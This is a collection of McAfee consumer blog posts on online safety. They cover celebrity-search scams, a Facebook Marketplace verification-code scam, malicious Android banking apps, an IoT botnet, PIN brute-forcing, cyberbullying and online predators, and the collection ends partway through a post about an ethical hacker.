Taking a sample set of the top 50 list, McAfee researchers discovered between 25 to 135 deepfake URLs per celebrity search. While there are instances of malicious deepfakes, many celebrity deepfakes fall into recreational or false advertising use cases right now. However, there is growing evidence that future deepfakes could turn deceptive — deliberately passing along disinformation in a public figure’s name.
You have every reason, and every right, to search for and enjoy your celebrity content safely. A mix of a sharp eye and online protection can keep you safe out there.
Hackers and scammers love riding the coattails of celebrities. By hijacking big names like Ryan, J-Lo, and Bad Bunny, they dupe plenty of well-meaning fans into downloading malware or handing over their personal info.
Of course, that’s no reason to stop searching for those celebs. Not at all. Go ahead and enjoy your shows, music, and movies—and all the news, gossip, and tea surrounding them. That’s all part of the fun. Just do it with a sharp eye and the proper protection that has your back.
The post McAfee 2023 Hacker Celebrity Hot List – Why Hackers Love Ryan Gosling so Much appeared first on McAfee Blog.
Reels of another kind rack up the views online. Stories about Facebook Marketplace scams.
Recently, TikTok’er Michel Janse (@michel.c.janse) got well over a million views with a most unusual story about selling furniture on Facebook Marketplace—and how it led to identity theft.
@michel.c.janse oops dont fall for this scam like me
The story goes like this:
A buyer reached out about the furniture Michel was selling, expressed interest, and then hesitated. Why the cold feet? The buyer wanted to speak to Michel on the phone to confirm that Michel was a real person. “Are you OK if I voice call you from Google?” Michel agreed, sent her number, and soon received a text with a Google Voice code. The buyer asked for the code, and as soon as Michel sent it, she got that sinking feeling. “I should have Googled before I did, because something feels really off.”
As she found out, it was. The scammer ghosted the conversation and ran off with the verification code.
This is a variation of the “Verification Code Scam,” where scammers ask you to send them that six-digit code you receive as part of an account login process. Here, scammers send a text message with a Google Voice verification code and ask you to send them that code. With it, they can create a Google Voice number linked to your phone number—and go on to commit other forms of identity theft in your name.
It happens so often that the U.S. Federal Trade Commission (FTC) has a page dedicated to the topic. Luckily, Michel got wise quickly enough. She quickly asked for another code and took back charge of that newly created Google Voice account.
This is just one of the many scams lurking about on Facebook Marketplace. Largely, Facebook is a great place packed with lots of great deals, yet you can get stung. But if you know what to look out for, you can spot those scams and steer clear of them when you do.
As the saying goes, buyer beware. And seller too. Scammers weasel their way into both ends of a transaction. Per Facebook, in addition to phishing attacks, scams on Facebook Marketplace take three primary forms:
A buyer scam is: When someone tries to buy or trade items from someone else without paying, resulting in a loss of money for the seller and a gain for the buyer. This might look like a buyer who:
An example, a scammer sends a seller a pre-paid shipping label to mail the item. Then they change the address via their tracking number and claim they never received the goods.
A seller scam is: When someone tries to sell or trade items to someone else without delivering the items as promised, resulting in a gain of money for the seller and a loss for the buyer. This might look like a seller who:
An example, a scammer offers up a game console—one that doesn’t work when you take it home and plug it in.
A listing scam is: When a listing appears to be dishonest, fake, or lures buyers to complete transactions outside Facebook Marketplace. This might look like a listing:
An example, you see a great price on a commuter bike, yet the seller wants to complete the transaction over text. And using a payment form not covered by Facebook’s purchase protection policies, such as Venmo or Zelle.
Like any transaction you make through social media, a few extra steps and a dose of buyer or seller beware can help you make a great purchase or sale. One that’s safe.
You can take three big steps to help set things straight.
Whether shopping on Facebook Marketplace or off, a combination of online protection software and smart habits can help you avoid getting scammed. Further, online protection can provide you with yet more ways of preventing and recovering from identity theft.
We’d like to thank Michel and all the others who have shared their stories. Getting scammed stings. That’s why people often fail to report it, let alone share that it happened to them. Yet scams are crimes. Without question, act and report on a scam for the crime that it is. Get the proper platforms and authorities involved.
Keep in mind the larger picture as well. Scams aren’t always one-offs. Organized crime gets in on scams as well, sometimes on a large scale. By acting and reporting on scams, you provide those platforms and authorities mentioned above with vital info that can help them shut it down.
Your best defenses are your nose and your online protection software. As Michel said, something felt off in her interaction. So, if something doesn’t pass the sniff test, pay attention to that instinct. Shut down that purchase or sale on Facebook Marketplace—and report it if you think it’s a scam. You might save someone else some heartache down the road.
The post How to Look Out For Scams on Facebook Marketplace appeared first on McAfee Blog.
Amidst the recent heartbreaking events in the Middle East, parents now face the challenge of protecting children from the overwhelming amount of violent and disturbing content so easily accessible to children online.
Reports of unimaginable acts, including graphic photos and videos, have emerged on popular social networks, leading child advocates to call for heightened monitoring and, in some cases, the removal of these apps from children’s devices. According to a recent investigation by The Institute for Strategic Dialogue, the team adopted the personas of 13-year-olds to establish accounts on Instagram, TikTok, and Snapchat. During a 48-hour period spanning from October 14 to 16, the researchers unearthed over 300 problematic posts. Surprisingly, a significant majority of these problematic posts, approximately 78%, were discovered on Instagram, with Snapchat hosting about 5% of them.
In today’s digital age, the consensus is clear: keeping older children informed about global events is important. However, given the abundance of real-time, violent content, the urgency to protect them from distressing material that could harm their mental well-being has become even more imperative.
In such times, there isn’t a one-size-fits-all strategy, but we can provide valuable tips to help you monitor and minimize your child’s exposure to violent content.
To wrap up, don’t lose sight of mental and physical well-being by implementing the strategies mentioned here. By setting a strong example of a balanced digital life and open communication about real-life crises, your children will naturally pick up on how to navigate the online world. Your actions speak volumes, and they will follow your lead.
The post Digital Strategies to Safeguard Your Child from Upsetting and Violent Content Online appeared first on McAfee Blog.
Recently, news broke that over 300,000 Android users downloaded supposed banking apps from the Google Play Store loaded with trojans. These malicious apps managed to outwit the store’s security checkpoints to install malware on the unsuspecting users’ devices. It is more important than ever to stay vigilant about mobile security.
The crafty hackers behind this threat disguised their trojans as commonly searched-for apps, such as QR code scanners, fitness apps, and other popular utilities. The malicious code within these apps is specifically designed to steal banking information, record keystrokes as users enter their account details, and capture screenshots of activities carried out on the phone.
The unique feature of this malware is that it only initiates its harmful activities after being installed. Whether or not the user is aware of the malware’s presence can vary. For the malware to trigger, it needs an additional step, often an in-app update that’s not through the Play Store. This update then downloads the malware payload onto the device. In numerous instances, the counterfeit apps force users into accepting this update once the app is downloaded.
While the apps originally found on the Play Store may not have contained malware in their code, they serve as a delivery system for the payload from other servers after being installed on a user’s device. This discrete method of operation is one of the reasons these harmful apps have managed to escape detection.
The evolving threat highlights the necessity of scrutinizing app permissions and being cautious of in-app prompts, especially if they deviate from the standard update processes provided by reputable app stores. As the malware landscape evolves with increasingly sophisticated tactics, understanding these threats and adopting proactive security measures is crucial for safeguarding the integrity of our digital devices and personal data.
→ Dig Deeper: McAfee 2023 Threat Predictions: Evolution and Exploitation
Smartphones are enticing targets for hackers. They contain personal information and photos, banking and other payment app credentials, and other valuable data that hackers can exploit. The smartphone’s other features—like cameras, microphones, and GPS—can offer hackers even more invasive capabilities.
Once a smartphone is compromised, a hacker can hijack social media, shopping, and financial accounts; drain wallets by racking up app store purchases or interfering in payment apps; and even read text messages or steal photos. Understanding the nature of these threats, it is essential for users to take protective measures.
→ Dig Deeper: McAfee 2023 Consumer Mobile Threat Report
Mobile applications have become an integral part of our lives, so the responsibility of app developers to ensure security is paramount. Users entrust these apps with their personal information, from contact details to financial data, making it imperative for developers to prioritize security throughout the entire app development process.
One of the primary responsibilities of app developers is to implement secure coding practices. This entails writing code that guards against vulnerabilities and potential exploits. Developers can significantly reduce the risk of security breaches by incorporating measures like robust authentication systems, data encryption, and secure data transmission protocols. Additionally, regular security audits and testing are essential to identify and rectify vulnerabilities promptly.
App developers must also be vigilant when it comes to user data protection. This involves not only securely storing sensitive information but also safeguarding it during transmission. Properly managing app permissions is another key aspect of ensuring user data privacy. Developers should request only the permissions necessary for an app’s core functionality and explain clearly to users why certain permissions are required.
To complete the discussion, app developers play a pivotal role in safeguarding user data and overall digital security. By adhering to secure coding practices, conducting regular security assessments, respecting user privacy, and responding swiftly to vulnerabilities, developers contribute to a safer and more trustworthy mobile app ecosystem. Ultimately, their commitment to security not only protects users but also upholds the integrity of the apps they create.
McAfee Pro Tip: App developers can only protect you if you download their applications from reputable app stores like Google Play and App Store. Downloading third-party applications can increase your risk of getting malware. Know more about third-party apps.
How do these harmful apps work? By presenting themselves as legitimate applications, they can sneak onto your phone and gain wide-ranging permissions to access files, photos, and functionalities. Alternatively, they may slip in code that enables hackers to gather personal data. This can result in various issues, from annoying popup ads to the loss of valuable identity information.
Some recent instances of such malicious apps include ad-blocking programs that serve up ads instead, VPN apps that charge subscriptions but provide no protection, and utility apps that misuse system privileges and permissions, further endangering users.
To avoid falling victim to such malicious apps, there are preventive steps you can take.
While major app marketplaces like Google Play and Apple’s App Store aim to eradicate malware from their platforms, hackers, being the persistent intruders they are, can find ways around these measures. Hence, extra vigilance on your part is essential. Below are some steps to help fortify your digital security:
Be wary of apps asking for unnecessary permissions, like simple games wanting access to your camera or microphone. Read the permissions list before downloading any app. If you find an app asking for more than it should need, it may be a scam. Delete it, and find a legitimate counterpart that doesn’t request for these invasive permissions.
Apps prompting you for immediate in-app updates can be a red flag. Typically, the app version you download from the store should be the most recent and not require an immediate update. Always update your apps through the app store, not the app itself, to avoid malware attacks.
Don’t download without researching the app first. Check the developer’s track record – have they published other apps with many downloads and good reviews? Malicious apps often have few reviews and grammatical errors in their descriptions. Stay alert for these signs.
Recommendations from trusted sources or reputable publications are often reliable as these sources have done the vetting for you. This method saves you time and ensures the app’s credibility.
Stick to Google Play and Apple’s App Store, which vet apps for safety and security. Third-party sites might not have a robust review process, and some intentionally host malicious apps. Google and Apple are quick to remove malicious apps once discovered, ensuring an added layer of safety.
Given the amount of data and information we store on our phones, having security software is just as crucial as having one on our computers and laptops. Whether you opt for comprehensive security software that safeguards all your devices or a specific app from Google Play or Apple’s iOS App Store, you’ll benefit from enhanced malware, web, and device security.
Updating your phone’s operating system is as important as installing security software. Updates often contain patches to fix vulnerabilities that hackers exploit to execute malware attacks. Therefore, regular updates are a necessary measure to keep your phone secure.
→ Dig Deeper: How Do I Clear a Virus From My Phone?
Staying vigilant and proactive against mobile malware is integral to maintaining your digital security. You can significantly ward off potential threats by scrutinizing app permissions, being wary of in-app updates, critically reviewing apps, trusting strong recommendations, avoiding third-party app stores, installing security software like McAfee Mobile Security, and updating your phone’s OS. Remember, a few moments spent on these precautions are minimal compared to the potential costs and consequences of a hacked phone.
The post Before You Download: Steer Clear of Malicious Android Apps appeared first on McAfee Blog.
The rise in popularity of Internet-connected smart devices has brought about a new era of convenience and functionality for consumers. From Smart TVs and refrigerators to wireless speakers, these devices have transformed the way we live and communicate. However, this advancement in technology is not without its downsides. One of the most notable is the increasing vulnerability to cyber-attacks. In this article, we’ll explore what happened when hundreds of thousands of these devices were roped into an extensive Internet-of-Things (IoT) cyber attack, how it happened, and how you can protect your smart devices to stay safe.
In what has been termed as the first widespread IoT cyber attack, security researchers discovered that over 100,000 smart home devices were manipulated to form a malicious network. This network, dubbed ‘ThingBot,’ was used to launch a massive phishing campaign, sending out approximately 750,000 spam emails over a two-week period.
The key players in this attack were the smart home appliances that many of us use every day. They range from Smart TVs and refrigerators to wireless speakers, all of which were connected to the internet. The attack signified two key developments: the rise of the IoT phenomenon and the substantial security threats posed by these increasingly connected devices.
→ Dig Deeper: LG Smart TVs Leak Data Without Permission
IoT refers to the growing trend of everyday devices becoming more connected to the web. This connection aims to bring added convenience and ease to our daily activities. It ranges from wearable devices like FitBit and Google Glass to smart TVs, thermostats, and computerized cars. While this trend is new and rapidly growing, its implications for security are significant.
The discovery of the IoT botnet in this attack demonstrates just how easily hackers can commandeer these connected smart devices. One would think that security software installed on PCs would provide adequate protection. Unfortunately, that’s not the case. The new generation of connected appliances and wearables does not come with robust security measures. This deficiency is the reason why hackers were able to infect more than 100,000 home devices in a global attack, manipulating these devices to send out their malicious messages.
→ Dig Deeper: The Wearable Future Is Hackable. Here’s What You Need To Know
Cybercriminals will continue to exploit the inherent insecurities in the IoT landscape. With the number of connected or “smart” devices projected to increase exponentially in the coming years (reaching an estimated 200 billion IoT devices by 2020). Here’s a list of those implications users can expect:
Prevention and precaution are the best defense against IoT cyber attacks. The first step is to secure your devices with a password. While it may seem simple and obvious, many consumers disregard this step, leaving their devices vulnerable to attacks. Using unique, complex passwords and frequently updating them can help to safeguard against hacking attempts. Furthermore, consider employing two-step verification for devices that offer this feature for additional security.
One must not forget the importance of software updates. Internet-connected devices such as smart TVs and gaming consoles often come with software that needs regular updating. Manufacturers typically release these updates to patch known security vulnerabilities. Hence, whenever there’s an update, it’s wise to install it promptly. It’s also crucial to exercise caution while browsing the internet on these devices. Avoid clicking links from unknown senders and do not fall for deals that appear too good to be true, as these are common phishing tactics.
→ Dig Deeper: Why Software Updates Are So Important
Before purchasing any IoT device, perform thorough research on the product and the manufacturer. Investigate the company’s security policies and understand the ease with which the product can be updated. In case of any doubts about the security of the device, don’t hesitate to reach out to the manufacturer for clarification. Remember, your security is paramount and deserves this level of attention.
Lastly, it’s vital to protect your mobile devices. Most IoT devices are controlled via smartphones and tablets, making them potential targets for hackers. Ensuring that these devices are secured helps to protect your IoT devices from being compromised. Services like McAfee LiveSafe™ offer comprehensive mobile security that provides real-time protection against mobile viruses, spam, and more, which significantly reduces the chances of a security breach.
McAfee Pro Tip: McAfee LiveSafe doesn’t just protect against mobile viruses. You can safeguard an unlimited number of your personal devices throughout the entire duration of your subscription. So, be sure to connect all your devices for optimal security.
As technology advances and the Internet-of-Things continues to expand, the security challenges associated with it will persist. The first global IoT cyber attack served as a wakeup call for both consumers and manufacturers about the potential security threats that come with the convenience of smart devices. It is essential for individual users to take proactive steps to secure their devices and for manufacturers to continually improve the security features of their products. By working together, we can enjoy the benefits of IoT without compromising our security. And by investing in reliable cybersecurity solutions like McAfee+, Total Protection, and Live Safe, you can enhance your defense against potential attacks and enjoy the benefits of IoT with greater peace of mind.
The post Smart TVs and Refrigerators Used in Internet-of-Things Cyberattack appeared first on McAfee Blog.
Digital technology has dramatically impacted our lives, making it easier and more convenient in many ways. With the use of smartphones, we perform a myriad of activities daily, from making phone calls and sending messages to shopping online and managing bank accounts. While these activities bring convenience, they also expose users to various security threats. Your Android PIN code is a critical aspect that protects your phone data from unauthorized access. But how safe is this four-digit code? This article aims to demystify this question and offers a comprehensive guide on the safety of Android PIN codes.
A Personal Identification Number (PIN) is a security code used to protect your mobile device from unauthorized access. It is usually a 4-digit number, though some devices allow longer PINs. When you set up a PIN, the device encrypts data and can only be accessed by entering the correct PIN. The idea behind the PIN is that it is easy for you to remember but difficult for others to guess. But is this method of protecting your data foolproof?
The first line of defense for your smartphone is a simple PIN code. Many users choose easy-to-remember combinations such as “1234” or “1111.” However, these are easily guessable and thus not very secure. Furthermore, a determined thief could try all 10,000 possible four-digit combinations until they hit the right one. This process could be done manually, but it has been demonstrated that it could also be automated with a device like the R2B2 robot, which can try all combinations in less than 24 hours.
The R2B2, or Robotic Reconfigurable Button Basher, is a small robot designed with a single, solitary function: to crack any Android four-digit locking code. Justin Engler, a security engineer at iSEC , created itPartners. The R2B2 uses a ‘brute force’ method of entering all 10,000 possible combinations of four-digit passcodes until it finds the right one. It doesn’t use specialized software or malware; it simply inputs combinations until it gets the right one.
Although the chances of your phone falling into the clutches of an R2B2 are slim, such technology raises concerns about the security of a four-digit PIN. If a simple robot can crack the code in less than a day, it questions the efficacy of a four-digit passcode in protecting your mobile data. This emphasizes the need for more robust, more secure forms of password protection.
→ Dig Deeper: Put a PIN on It: Securing Your Mobile Devices
Even though a four-digit PIN remains one of the most common forms of mobile security, it may not necessarily be the most secure. For times when a PIN code does not offer sufficient protection, alternative security measures can step in. Advanced Android users can access a wide range of security features beyond the conventional four-digit PIN, including patterns, passwords, and biometrics.
→ Dig Deeper: 5 Tips For Creating Bulletproof Passwords
→ Dig Deeper: MasterCard Wants to Verify by Selfies and Fingerprints! The Ripple Effects of Biometric Data?
Beyond passcodes and biometrics, there are a range of additional security measures that can be implemented to protect your phone:
McAfee Pro Tip: Refrain from sharing your PIN codes and passwords with anyone. Use a reputable password manager to efficiently and securely manage your collection of passwords and passcodes.
While the advent of technology like R2B2 does raise concerns about the sufficiency of a four-digit PIN, this is only part of the story. The landscape of mobile security is variable and complex, and it’s essential to stay vigilant. By using a mix of solid passcodes (or alternative forms of security like biometrics), implementing additional security measures, and regularly updating and reviewing your security settings, you can significantly enhance the security of your Android device. After all, one’s mobile device often holds a wealth of personal information, making its protection a high priority in our increasingly digital world.
The post How Safe Is Your Android PIN Code? appeared first on McAfee Blog.
Unfortunately, cyberbullying has become a prevalent and emerging threat in our digital age. This type of bullying, carried out through computers and similar technologies, including cell phones, often involves harmful or intimidating comments and public posts created with malevolent intent to humiliate the victim. It’s a phenomenon that doesn’t only affect adults but is incredibly common among young people. As a result, it’s crucial to understand how to help your children navigate and mitigate this pervasive, especially now that they can leave digital footprints anywhere and encounter people with bad intentions.
One of the distinguishing factors of cyberbullying is that, unlike traditional in-person bullying, it doesn’t simply end when the bully is out of sight. Today, bullies can virtually pursue their victims everywhere through technology. This implies that bullying can transpire without the victim’s immediate consciousness, and due to the extensive reach of social media, the bullying can be witnessed by a significantly larger audience than the conventional school playground.
Bearing in mind the challenges in getting a cyberbully to cease their harmful behavior, the most effective strategy is to educate your children about safe online habits to prevent such situations from arising in the first place.
→ Dig Deeper: More Dangers of Cyberbullying Emerge—Our Latest Connected Family Report
Evolved from the classic schoolyard bullies of old, these cyberbullies can take various forms depending on their attack vector and intent. In fact, there are said to be four types of cyberbullies: the Vengeful Angel, the Power Hungry Cyberbully, Revenge of the Nerds/Inadvertent Cyberbully, and Mean Girls. The Vengeful Angel bullies in order to protect the weak/other victims and often takes action to protect a loved one or friend. The Power Hungry archetype, however, is just a nasty, unkind person who wants to display dominance and control over others. Then there’s the Inadvertent Cyberbully, who are usually the ones getting bullied online or in real life and are typically trying to enact some form of justice or revenge anonymously from the web. Mean Girls are the opposite – and take their online actions in order to impress a group of friends or gain social status.
Not only is there a variety in the kinds of bullies across the web, but also many types of cyberbullying techniques these meanies use to bother their victims. First and foremost, there’s harassment, which involves repeated, offensive messages sent to a victim by a bully on some type of online medium. These messages can be rude, personal, and even threatening, with one recent example emerging between two wives of professional hockey players. Similar to harassment is Flaming – an online fight conducted via emails, social media messages, chat rooms, you name it.
Then there are very targeted attacks, named Exclusion and Outing. With Exclusion, cyberbullies select one individual to single out. Exclusion is a popular method, with examples everywhere, from high students in Iowa to well-known celebrities. With Outing, these harassers share private information, photos, and videos of a single person to humiliate them online. There’s also the anonymous angle, AKA Masquerading, where a cyberbully creates a fake online identity to belittle, harass, and degrade their victim – which a nurse in New Zealand was a victim of for a whopping five years.
Parents should inform their children that their online activities will be monitored using parental control software. Explaining how this software works and how it can protect them is essential. This policy should be well established before your child gets their phone or computer.
Furthermore, parents should discuss cyberbullying with their children and help them understand how it happens. This discussion should take place before your child gets their devices. Before a child gets their own digital devices, they must disclose their passwords to their parents. Parents can reassure them that these passwords will only be used during emergencies.
A condition set before children get their own digital devices is that they should consent to instructions on smart online habits. Importantly, they must understand that once something is posted online, it stays there forever.
Another essential guideline for owning a device is that children should be cautious about their personal information. They should be advised not to publicly share their cell phone number and email address and should never disclose their passwords, even to close friends.
→ Dig Deeper: 8 Signs It May Be Time for Parental Controls
Once your child obtains their digital devices, engaging in role-playing exercises with them is suggested. This allows parents to simulate scenarios where the child might encounter a cyberbully, teaching them appropriate responses. This exercise can also provide a safe space for your child to practice dealing with cyberbullying tactics and learn to act assertively without resorting to aggression or submission.
In this role-playing activity, parents should encourage their children to report any bullying incidents, even if it is simulated or perceived as insignificant. This activity not only cultivates resilience but also reassures children that they won’t be blamed or punished for being a victim of cyberbullying.
Parents must maintain vigilance regarding their child’s internet activities despite all preventive measures. Regular check-ins and encouraging open communication about their online experiences can create a strong bond of trust between parents and children. Assure them they can approach you without fear if they are bullied online. Encourage them to share any suspicious interactions and reassure them that they won’t be in trouble for reporting cyberbullying incidents.
If possible, try to familiarise yourself with the social media platforms that your children are using. Understanding these platforms can provide insight into their online experience and potential risks. Such knowledge can be valuable when initiating discussions about cyberbullying, providing tangible examples and relatable scenarios.
McAfee Pro Tip: Get McAfee’s parental control to safeguard your children against online threats and cyberbullying. With its features, you can actively supervise your kids’ online interactions, establish usage time restrictions, and prevent exposure to inappropriate content. This reassures you that your children can explore the online realm while enjoying a layer of protection.
Cyberbullying is a complex issue that evolves with the rapid advancements of technology and social media platforms. Therefore, parents must stay updated about the latest forms of cyberbullying and the newest safety settings available on various platforms. Parents should also regularly educate themselves about digital safety and responsible internet usage and share this information with their children to boost their awareness and readiness.
Parents and children can attend webinars, workshops, and seminars about cyberbullying and online safety. Learning together provides a good bonding exercise and ensures that both parties are on the same page. Schools and local community centers often offer resources and programs for cyberbullying awareness and prevention.
→ Dig Deeper: Cyberbullying’s Impact on Both Society and Security
Typically, cyberbullying is common among teens navigating the trials and tribulations of middle and high school. But that doesn’t mean it’s exclusive to teens, and that doesn’t mean there aren’t steps parents and kids alike can do to stop cyberbullying in its tracks.
If you’re the subject of cyberbullying, the first thing you need to do is block the bully. Then, make sure you collect evidence – take screenshots, print the proof, and do whatever you can to have material to back up your claim. It depends on the type of cyberbullying at work, but you can also use the internet to your advantage and look up relevant resources to aid with your issue.
If you’re a parent, the most important thing is communication. Make yourself available as a resource and remind your kids that they can tell you anything happening in their online world. Beyond that, continuously weave cybersecurity into your family discussions. Remind kids of the simple steps to be safe online, and ensure they know when to flag a cyberbully or online scheme.
There are also technical avenues you can take to protect your kid online. Look into solutions that will help you monitor your family’s online interactions, such as McAfee Safe Family. This solution, for instance, can help you set rules and time limits for apps and websites and see what your kids are up to at a glance. Of course, these solutions are not the be-all and end-all for stopping cyberbullying, but they can help.
Now, there’s still a lot more research that has to be done to understand the cyberbullying problem society is faced with fully. So, as this problem continues to evolve, so must the research, solutions, and regulations that will be created to combat the issue. With the right proactive action, people everywhere can stand up to cyberbullies.
→ Dig Deeper: Cyberbullying – How Parents Can Minimize Impact On Kids
In conclusion, cyberbullying is a pressing issue that requires continuous attention and education. By teaching your children what it is and how it happens, setting up rules for responsible device usage, conducting role-play exercises together, and staying informed about their online activities, you can better equip them to navigate the digital world safely. Remember, the ultimate goal is not to control your child’s online activities but to empower them with the tools and understanding necessary to protect themselves online.
The post A Detailed Guide on Cyberbullying appeared first on McAfee Blog.
Despite the extensive media coverage and awareness campaigns, it’s harrowing to admit that children, particularly vulnerable teenagers, are still targeted by online predators. This is not a matter exclusive to the “other” kids – it affects everyone, and young individuals’ innocent and accepting nature often leads them into the dangerous trap of these predators.
As parents, caregivers, and mentors, it’s our responsibility to educate and guide our children about the virtual perils that lurk within their screens. An essential part of this is continuous communication, ensuring they understand the gravity of the situation and can recognize the deceptive tactics employed by these predators.
A heartbreaking example of how these predators operate is the story of Nicole Lovell, a 13-year-old girl who made headlines not long ago. Nicole met David Eisenhauer, an engineering student from Virginia Tech, through the messaging app Kik. Their relations initially seemed harmless, characterized by playful flirtations and shared stories. However, their friendship took a horrific turn when they decided to meet in person, leading to Nicole’s tragic demise. Her body was found shortly after their encounter.
David exhibited no signs of having a ‘dark side,’ an aspect that made their meeting seem all the more innocent. This incident is a stark reminder that anyone can fall prey to such predators, regardless of their background or circumstances. This is why discussing and dissecting such incidents with our children is crucial to teaching them the harsh realities of the digital world.
Identifying an online predator’s markers is a critical aspect of child safety education. More often than not, these individuals are cunning and mentally unbalanced and spend a significant amount of their time seeking and ‘grooming’ their prospective victims online. The ultimate goal of these predators is to exploit children, either by convincing them to send inappropriate photos or by meeting them in person.
Initiating a continuous dialogue with your children about these predators is crucial. Make them aware of the tactics these individuals employ, such as appearing overly friendly or empathetic. Let them know that predators will go to any length to appear younger and more relatable.
→ Dig Deeper: Reports of Online Predators on the Rise. How to Keep Your Kids Safe
Addressing such a sensitive issue with your children can be challenging but necessary. Start by discussing cases like Nicole’s, focusing not only on the tragic outcome but also on the lead-up events and why she may have developed such a strong online connection. Discussing how innocent online friendships can spiral into dangerous situations can be an excellent eye-opener for your kids.
It’s crucial to teach your kids to look out for strangers who are “too friendly” or excessively understanding. Tell them that predators keep themselves updated with the latest movies, music, and trends to seem younger and easily start conversations with children. Remember, predators will say anything to appear more youthful than they actually are.
You don’t always know what your children are doing online. Their digital footprints could be anywhere. That’s why it is imperative to understand the red flags and warning signs that may signal a hazardous online interaction, especially when they already encounter a predator, and you’re still in the shadow.
Reinforcing the importance of online privacy is a crucial step in protecting your kids from virtual predators. Teach your children that personal information such as their full name, address, school, and phone number should never be shared online. They must also understand that specific images and details about their life can also reveal too much to an online predator. Remind them to limit geotagged photos as this can expose their location, and also to strictly control who is able to view their social media accounts.
→ Dig Deeper: Why You Should Think Before Geotagging that Selfie
Explain to your kids the dangers of accepting friend requests or communicating with strangers online. Make them aware that individuals posing as children or teenagers could be adults with malicious intent. Reinforce that anyone who asks them to keep a conversation secret or requests for personal information or inappropriate content is a potential danger, and they should inform you immediately if this occurs.
→ Dig Deeper: Making Online Safety a Priority for Our Tech-Savvy Children
As parents, we must stay informed about our children’s online activities, which goes far beyond just asking them about it. This can involve regularly reviewing their social media profiles and friends lists and ensuring they only interact with people they know personally. Familiarize yourself with the platforms and apps your children use to comprehend their functionalities and potential risks better.
Creating house rules regarding internet use can be an effective measure to ensure online safety. This could involve having specific periods when the internet can be used, limiting the time spent online, and setting out where internet-access devices can be used. For instance, allowing internet use only in common areas instead of bedrooms can be a good practice. It is essential to have ongoing dialogues about these rules and their reasons so your children can understand and appreciate their importance.
In an age where the online world is a significant part of our children’s lives, online safety education is essential. It’s crucial that, as parents, caregivers, and mentors, we take proactive steps to protect our children from the pervasive threat of online predators. This means having open and ongoing conversations about the real dangers that can lurk behind a screen, teaching kids to guard their online presence, and implementing online safety measures. Together, we can ensure the internet becomes safer for our children to learn, explore, and connect with others. Protect your whole family with McAfee+ Family plans.
The post Could Your Kids Spot an Online Predator? appeared first on McAfee Blog.
In the age of digital data and Internet access, the potential for scams is more significant than ever. These scams often involve leveraging popular search queries to trap unsuspecting netizens into their malicious schemes. Among the top searches in the online world, celebrities hold a prime spot. Through this guide, we aim to shed light on how scammers take advantage of the global fascination with celebrities to target their potential victims.
As digital users, most of us are likely well-acquainted with the phrase “Just Google it.” The search engine has become a go-to source for any information ranging from essential daily needs to entertainment gossip. But it’s crucial to remember that while you’re in pursuit of data, scammers are in search of their next victim.
Scammers have significantly evolved with the advancement of technology. They’ve mastered the art of creating fake or infected websites that can harm your computer systems, extract your financial information, or even steal your identity. Their strategies often include luring victims through popular searches, such as the latest Twitter trends, breaking news stories, major world events, downloads, or even celebrity images and gossip. The higher the popularity of the search, the greater the risk of encountering harmful results.
McAfee has conducted research for six consecutive years on popular celebrities to reveal which ones are riskiest to search for online. For instance, Emma Watson outplaced Heidi Klum as the most dangerous celebrity to look up online. Interestingly, it was the first year that the top 10 list comprised solely of women. Cybercriminals commonly exploit the names of such popular celebrities to lead users to websites loaded with malicious software, consequently turning an innocent search for videos or pictures into a malware-infected nightmare.
→ Dig Deeper: Emma Watson Video Scam: Hackers Use Celeb’s Popularity to Unleash Viruses
Scammers are well aware of the allure the word “free” holds for most Internet users. They cleverly exploit this to get your attention and draw you into their traps. For instance, when you search for “Beyonce” or “Taylor Swift” followed by prompts like “free downloads”, “Beyonce concert photos”, or “Taylor Swift leaked songs”, you expose yourself to potential online threats aiming to steal your personal information. It’s always prudent to maintain a healthy level of skepticism when encountering offers that seem too good to be true, especially those labeled as “free.”
While the internet can be a dangerous playground, it doesn’t mean that you cannot protect yourself effectively. Using common sense, double-checking URLs, utilizing safe search plugins, and having comprehensive security software are some strategies to help ensure your online safety. This guide aims to provide you with insights and tools to navigate the online world without falling prey to its many hidden dangers.
Truth be told, the responsibility for online safety lies primarily with the user. Just as you would not walk into any shady-looking place in real life, it requires a similar instinct to avoid shady sites while browsing online. One important piece of advice – if something appears too good to be true, in all probability, it is. So, take note of these practical tips to help you guard against celebrity scams and other online threats:
→ Dig Deeper: How to Tell Whether a Website Is Safe or Unsafe
→ Dig Deeper: The Big Reason Why You Should Update Your Browser (and How to Do It)
Having comprehensive security software installed on your devices is another crucial step towards preventing scams. Good antivirus software can protect against the latest threats, alert you about unsafe websites, and even detect phishing attempts. Furthermore, always keep your security software and all other software updated. Cybercriminals are known to exploit vulnerabilities in outdated software to infiltrate your devices and steal your data.
Apart from ensuring you have security software, be cautious about what you download on your devices. Trojans, viruses, and malware are often hidden in downloadable files, especially in sites that offer ‘free’ content. Cybercriminals tempting users to download infected files often use popular celebrity names. Therefore, download wisely and from reputed sources.
McAfee Pro Tip: Before committing to a comprehensive security plan, it’s crucial to evaluate your security protection and analyze your requirements. This proactive stance forms the bedrock for crafting strong cybersecurity measures that cater precisely to your unique needs and potential vulnerabilities. For more information about our acclaimed security solutions, explore our range of products.
In the digital world, where information and entertainment are available at our fingertips, it’s crucial to remain vigilant against scams, especially those involving celebrities. By exercising prudent online practices like scrutinizing URLs, using safe search plugins, and installing comprehensive security software, we can significantly reduce our risk of falling prey to these scams.
It’s imperative to understand that the popularity of a search term or trend is directly proportional to the risk it carries. So next time, before you search for your favorite celebrity, remember, the more famous the celebrity, the greater the risk. Together with McAfee, let’s promote safer browsing practices and contribute to a safer online community for all.
The post Celebrities Are Lures For Scammers appeared first on McAfee Blog.
Most of us believe hacking to be an event that happens to ‘the other person,’ often refusing to accept that it could very much be a reality for us as well. While hacking and social engineering might seem like concepts only prevalent in big-screen thrillers, the truth is they occur more frequently than we’d like to admit. Your email address, innocuous as it may seem, is often one of the gateways into your digital persona. This article aims to shed light on the potential dangers and impacts of giving away your email address to the wrong people.
To offer a real-life perspective, we’ll follow a conversation with an ethical hacker called ‘Oz.’ Ethical hackers, or ‘white hat’ hackers, are those who use their hacking skills to uncover security vulnerabilities and help implement protective measures against other malevolent hackers, known as ‘black hat’ hackers. Despite Oz’s assurance that he belongs to the white hat category, the following discourse will reveal how much information a hacker can come across based solely on your email address.
→ Dig Deeper: Are All Hackers Bad?
Initiating communication with Oz took a toll on my nerves, considering the potential threat to my data privacy. For communication, Oz suggested using an email address, prompting me to create a separate email account solely for our conversations. Once the lines of communication were established, I posed my first question: “Suppose we met at a coffee shop, exchanged pleasantries, and all I left you with was my email address. What kind of information could you gather about me?”
